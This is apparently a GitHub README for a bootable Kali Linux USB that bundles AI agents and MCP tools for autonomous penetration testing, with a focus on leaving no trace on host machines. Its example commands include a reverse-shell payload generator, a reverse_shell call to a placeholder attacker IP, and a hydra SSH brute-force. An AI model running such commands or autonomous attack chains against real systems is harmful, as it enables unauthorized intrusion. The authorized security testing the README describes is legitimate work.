Adarsh1Y/kali-opencode-usb
GitHub: Adarsh1Y/kali-opencode-usb
集成了 AI 驱动渗透测试工具的 Kali Linux 可启动 USB,支持离线运行、自主化攻击链和自动生成报告,实现便携、无痕的安全评估。
Stars: 1 | Forks: 0
# 🗡️ Kali + OpenCode 便携式渗透测试 USB
一个结合了 **Kali Linux Live** 与 **AI 驱动的渗透测试工具** 的可启动 USB 驱动器:包含 OpenCode、CLI Agent、Kali MCP 和 Shannon Plugin,用于自主化渗透测试。
[](LICENSE)
[](https://kali.org)
[](https://opencode.ai)
[](https://github.com/amranu/cli-agent)
[](https://github.com/k3nn3dy-ai/kali-mcp)
[](https://github.com/vichhka-git/opencode-shannon-plugin)
## 🔥 为什么会有这个项目
传统渗透测试工作流的问题:
| 问题 | 本解决方案 |
|---------|---------------|
| 工具分散在不同的机器上 | 单个 USB,一切预配置完毕 |
| 手动、重复的侦察工作流 | AI 工具自动化工作流 |
| 忘记记录发现 | 自动化文档记录和报告 |
| 在客户端系统上留下痕迹 | 启动 Live USB,不接触主机磁盘 |
| AI 工具依赖 API | CLI Agent + Ollama 可离线工作 |
| 工具的学习曲线陡峭 | Kali MCP + Shannon 通过 AI 暴露工具 |
| 复杂的多阶段攻击 | Shannon 处理自主化渗透测试 |
## 📦 你将获得什么
- **Full Kali Linux** - 每一个渗透测试工具(nmap, metasploit, burp, hashcat 等)
- **OpenCode** - 现代化 AI CLI,支持插件、MCP、Web UI
- **CLI Agent** - 轻量级 AI Agent,支持本地 Ollama 模型
- **Kali MCP** - 35+ 安全工具作为 MCP 工具提供
- **Shannon Plugin** - 自主化渗透测试,包含 600+ Docker 工具 + 浏览器自动化
- **Persistence(持久化)** - 你的配置、工作流和发现能在重启后保留
- **Forensically Clean(取证级清洁)** - 移除 USB,主机上无痕迹(仅内存运行)
## 🤖 AI 工具套件
### OpenCode (云端 + 本地)
```
opencode # Start TUI
opencode web # Start web interface
```
**特性:** TUI, Web 界面, MCP, 插件, 多 Agent, GitHub 集成
### CLI Agent (本地优先)
```
agent chat # Cloud API
agent chat --model ollama:llama3 # Offline with Ollama
```
### Kali MCP (35+ 安全工具)
```
/port_scan target=192.168.1.1 scan_type=quick
/dns_enum domain=example.com
/hydra_attack target=10.0.0.1 service=ssh
```
### Shannon Plugin (自主化渗透测试)
```
/shannon-scan target=example.com # Full autonomous pentest
/shannon-recon target=example.com # Reconnaissance only
/shannon-report # Generate professional report
```
**Shannon 工具:**
| 工具 | 用途 |
|------|---------|
| `shannon_docker_init` | 启动 Docker 容器 |
| `shannon_recon` | 侦察 (nmap, subfinder, whatweb) |
| `shannon_vuln_discovery` | 漏洞扫描 |
| `shannon_browser` | Playwright 浏览器测试 |
| `shannon_exploit` | 漏洞利用 (已授权) |
| `shannon_report` | 生成专业报告 |
| `shannon_idor_test` | IDOR 漏洞测试 |
| `shannon_upload_test` | 文件上传测试 |
**Shannon 捆绑工具:** nmap, sqlmap, nikto, nuclei, gobuster, ffuf, hydra, hashcat, gowitness, BrowserBruter, Playwright
## 🚀 快速开始
### 构建 USB
```
git clone https://github.com/Adarsh1Y/kali-opencode-usb.git
cd kali-opencode-usb
sudo ./build-usb.sh /dev/sdX
# 等待 10-20 分钟 (下载约 3GB Kali ISO)
```
### 启动
1. 将 USB 插入目标机器
2. 从 USB 启动(按 F12/Del/Esc 进入启动菜单)
3. 选择 **"Live USB Persistence"**
4. 登录:`kali` / `kali`
### 首次启动设置
```
sudo bash ~/opencode-setup.sh
```
这将安装:
- OpenCode
- CLI Agent
- Kali MCP
- Ollama (可选)
## 📁 仓库结构
```
kali-opencode-usb/
├── build-usb.sh # USB builder script
├── kali-mcp/ # Kali MCP Server (35+ tools)
│ ├── kali_mcp_server/ # MCP tools implementation
│ ├── Dockerfile # Docker container
│ └── README.md # Kali MCP docs
├── opencode-shannon-plugin/ # Shannon Plugin (autonomous pentest)
│ ├── src/ # Plugin source code
│ ├── Dockerfile # Shannon Docker tools
│ └── README.md # Shannon docs
├── cli-agent/ # CLI Agent (from ~/cli-agent)
├── postinstall/
│ ├── opencode-setup.sh # First-boot setup
│ └── README-OPENCODE.txt # Quick reference
├── scripts/
│ ├── backup-config.sh
│ └── deploy-node.sh
└── docs/
├── USAGE.md
└── SECURITY.md
```
## 🔧 MCP 配置
OpenCode 已预配置 MCP 服务器和插件:
```
// ~/.config/opencode/opencode.jsonc
{
"mcp": {
"cli-agent": {
"type": "local",
"command": ["~/cli-agent/.venv/bin/python", "~/cli-agent/mcp_server.py"],
"enabled": true
},
"kali-mcp": {
"type": "local",
"command": ["~/kali-mcp/.venv/bin/python", "-m", "kali_mcp_server"],
"enabled": true
}
},
"plugin": [
"~/opencode-shannon-plugin"
]
}
```
## 🛠️ Kali MCP 工具 (35+)
### 网络工具
```
/port_scan target=192.168.1.1 scan_type=full
/network_discovery target=192.168.1.0/24 discovery_type=comprehensive
/dns_enum domain=example.com record_types=a,mx,ns,txt
/subdomain_enum url=https://example.com
```
### Web 应用程序
```
/web_enumeration target=http://example.com enumeration_type=full
/vulnerability_scan target=example.com scan_type=comprehensive
/spider_website url=https://example.com depth=3
/header_analysis url=https://example.com
/ssl_analysis url=https://example.com port=443
```
### 漏洞利用
```
/exploit_search search_term="apache 2.4" search_type=web
/payload_generate payload_type=reverse_shell platform=linux lhost=YOUR_IP lport=4444 format=elf
/reverse_shell lhost=YOUR_IP shell_type=bash lport=4444
```
### 凭证
```
/hydra_attack target=192.168.1.1 service=ssh username=admin passlist=/usr/share/wordlists/rockyou.txt
/hash_identify hash_value=5d41402abc4b2a76b9719d911017c592
/encode_decode data="hello" operation=encode format=base64
```
### Session 管理
```
/session_create session_name="client-audit" description="Q1 audit" target=example.com
/session_list
/session_switch session_name="client-audit"
/session_status
```
### 报告
```
/create_report title="Security Assessment" findings="..." report_type=markdown
/save_output content="..." filename="notes" category="general"
/file_analysis filepath=/path/to/file
```
## 🏗️ 架构
```
┌─────────────────────────────────────────────────────────┐
│ USB Drive │
├─────────────────────────────────────────────────────────┤
│ [EFI Boot] - Kali bootloader │
│ [Live ISO] - Read-only Kali base system │
│ [Persist] - /home/kali/ │
│ ├── .opencode/ - OpenCode config │
│ ├── .config/opencode/ - MCP + Plugin config │
│ ├── cli-agent/ - CLI Agent │
│ ├── kali-mcp/ - Kali MCP Server │
│ ├── opencode-shannon/ - Shannon Plugin │
│ └── shannon-tools - Docker image (600+ tools) │
└─────────────────────────────────────────────────────────┘
│
│ Boot on any x64 machine
▼
┌─────────────────────────────────────────────────────┐
│ Your Portable Pentest Rig │
│ • Full Kali toolset │
│ • OpenCode (cloud AI + orchestration) │
│ • CLI Agent (offline AI with Ollama) │
│ • Kali MCP (35+ security tools) │
│ • Shannon (autonomous pentesting) │
│ • Nothing touches host disk │
└─────────────────────────────────────────────────────┘
┌───────────────────────────────────────────────────────┐
│ USB Drive │
├───────────────────────────────────────────────────────┤
│ [EFI Boot] - Kali bootloader │
│ [Live ISO] - Read-only Kali base system │
│ [Persist] - /home/kali/ │
│ ├── .opencode/ - OpenCode config │
│ ├── .config/opencode/ - MCP servers config │
│ ├── cli-agent/ - CLI Agent │
│ ├── kali-mcp/ - Kali MCP Server │
│ └── .openclaw/ - Ollama models (optional) │
└───────────────────────────────────────────────────────┘
│
│ Boot on any x64 machine
▼
┌───────────────────────────────────────────────────────┐
│ Your Portable Pentest Rig │
│ • Full Kali toolset │
│ • OpenCode (cloud AI + orchestration) │
│ • CLI Agent (offline AI with Ollama) │
│ • Kali MCP (35+ security tools via AI) │
│ • Nothing touches host disk │
└───────────────────────────────────────────────────────┘
---
## 🔐 安全考虑
> ⚠️ **Only test systems you have written authorization to test.**
- Encrypt persistence partition for sensitive engagements
- Never leave USB unattended
- Use VPN for remote connections
- Document all authorization in memory files
---
## 🙏 致谢
Built with:
- **[Kali Linux](https://kali.org)** - Penetration testing distribution
- **[OpenCode](https://opencode.ai)** - Modern AI CLI
- **[CLI Agent](https://github.com/amranu/cli-agent)** - MCP-enabled AI assistant
- **[Kali MCP](https://github.com/k3nn3dy-ai/kali-mcp)** - 35+ security tools via MCP
- **[Shannon Plugin](https://github.com/vichhka-git/opencode-shannon-plugin)** - Autonomous pentesting
- **[Ollama](https://ollama.com)** - Local AI runtime
---
## 📬 联系方式
- **GitHub:** [@Adarsh1Y](https://github.com/Adarsh1Y)
- **Discord:** [OpenCode Community](https://discord.gg/opencode)
---
> **Disclaimer:** This tool is for authorized security testing only.
```
标签:AI 安全, AI风险缓解, Burp Suite, DLL 劫持, IP 地址批量处理, Live USB, LLM评估, MCP 协议, Nmap, Ollama, OpenCode, Web截图, 便携式安全, 元数据清理, 大语言模型, 容器安全, 密码管理, 应用安全, 插件系统, 数字取证, 本地离线, 特征检测, 网络安全, 网络安全, 自主渗透, 自动化攻击, 自动化脚本, 虚拟驱动器, 请求拦截, 逆向工具, 配置审计, 隐私保护, 隐私保护